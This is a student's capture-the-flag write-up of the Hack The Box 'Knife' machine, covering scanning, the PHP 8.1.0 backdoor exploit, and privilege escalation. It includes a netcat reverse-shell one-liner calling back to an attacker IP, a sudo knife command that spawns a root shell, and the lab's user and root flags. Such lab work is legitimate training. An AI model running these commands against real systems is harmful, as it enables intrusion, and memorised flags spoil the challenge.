HACK THE BOX MACHINE

KNIFE

Project Report

CERTIFIED IT INFRASTRUCTURE & CYBER SOC ANALYST

Submitted By

KAILAS.V
 PENETRATION TEST METHODS

 SCANNING
 ENUMERATION
 EXPLOITATION
 PRIVILEGE ESCALATION
1.SCANNING

In hack the box knife machine it is given that the ip address is

10.10.10.242
I did an nmap scan to find the ports using the command
sudo nmap -sS -A -Pn 10.10.10.242
2. ENUMERATION

I opened port 80 and it opened a website but there was

nothing to do.
I found that the php 8.1.0 is vulnerable and I searched for the exploit
of PHP 8.1.0 and found out a python program file for exploitation.

And I downloaded the exploitation file by using the command and

named it as file.py
wget https://www.exploit-db.com/raw/49933
3.EXPLOITATION
Then I ran the exploitation file using the command
python3 file.py

After doing this I got into the machine but couldnot do anything so I
used another application called NETCAT using the command
nc -nlvp 1234
Then using the previous terminal in which python is running I
entered the following code.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.75 1234 >/tmp/f

On the other tab this was running

I looked in home directory I found James, inside if James I found the
user flag
‘3996b98220f1bb8b675640e9f5086408’

4. PRIVILEGE ESCALATION
I tried to get root access using the command
sudo /usr/bin/knife exec --exec "exec '/bin/bash -i'"

Now I got the root access and the root flag

‘1ce3e62bc3d0600f691e21eb4a41a411’

Finally the machine knife was hacked.